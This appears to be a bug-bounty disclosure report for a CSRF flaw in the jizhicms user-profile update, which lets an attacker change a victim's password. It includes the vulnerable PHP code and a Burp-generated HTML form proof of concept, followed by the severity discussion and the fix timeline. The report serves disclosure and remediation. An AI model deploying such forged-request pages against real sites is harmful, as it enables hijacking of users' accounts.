CSRF vulnerability exists in modifying user information (including password) in cherry-toto/jizhicms

Valid

Reported on

Jul 30th 2022


Description

Csrf vulnerability in user information modification page

Proof of Concept

In \app\home\c\UserController

            $re = M('member')->update(['id'=>$this->member['id']],$w);
            $member = M('member')->find(['id'=>$this->member['id']]);
            unset($member['pass']);
            $_SESSION['member'] = array_merge($_SESSION['member'],$member);
            if($this->frparam('ajax')){
                JsonReturn(['code'=>0,'msg'=>JZLANG('修改成功!')]);
            }
            Error(JZLANG('修改成功!'));
// PoC.html
var payload = ...
```<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/user/userinfo.html" method="POST">
      <input type="hidden" name="username" value="rA5OOQ" />
      <input type="hidden" name="sex" value="0" />
      <input type="hidden" name="litpic" value="" />
      <input type="hidden" name="file&#95;litpic" value="" />
      <input type="hidden" name="tel" value="111111111111" />
      <input type="hidden" name="email" value="111111123" />
      <input type="hidden" name="province" value="" />
      <input type="hidden" name="city" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="signature" value="" />
      <input type="hidden" name="birthday" value="" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="repassword" value="" />
      <input type="hidden" name="invite" value="http&#58;&#47;&#47;localhost&#47;login&#47;register&#46;html&#63;invite&#61;1" />
      <input type="hidden" name="submit" value="�&#143;&#144;&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>




# Impact

On the page of modifying user information, you only need to click once to complete the modification of password and other information, without further verification; An attacker can construct a special request. As long as the user is induced to click this link, important information such as personal password will be modified;
We are processing your report and will contact the cherry-toto/jizhicms team within 24 hours. 2 months ago
We have contacted a member of the cherry-toto/jizhicms team and are waiting to hear back 2 months ago
留恋风 modified the Severity from Critical to Low 2 months ago
breakalegcml
2 months ago

Researcher


Hello, I don't agree with positioning this CSRF as low hazard. CSRF is generally medium hazard, not to mention that it can change all user information; I want to know why we should change the severity of this CSRF to low hazard?

留恋风 modified the Severity from Low to High (7.3) 2 months ago
breakalegcml
2 months ago

Researcher


Hello, thank you very much for changing the vulnerability level; Could you please confirm this vulnerability and submit it

We have sent a follow up to the cherry-toto/jizhicms team. We will try again in 7 days. 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
留恋风 validated this vulnerability 2 months ago
breakalegcml has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
留恋风 confirmed that a fix has been merged on 24893d 2 months ago
留恋风 has been awarded the fix bounty
breakalegcml
a month ago

Researcher


Hello, could you please apply for CVE

to join this conversation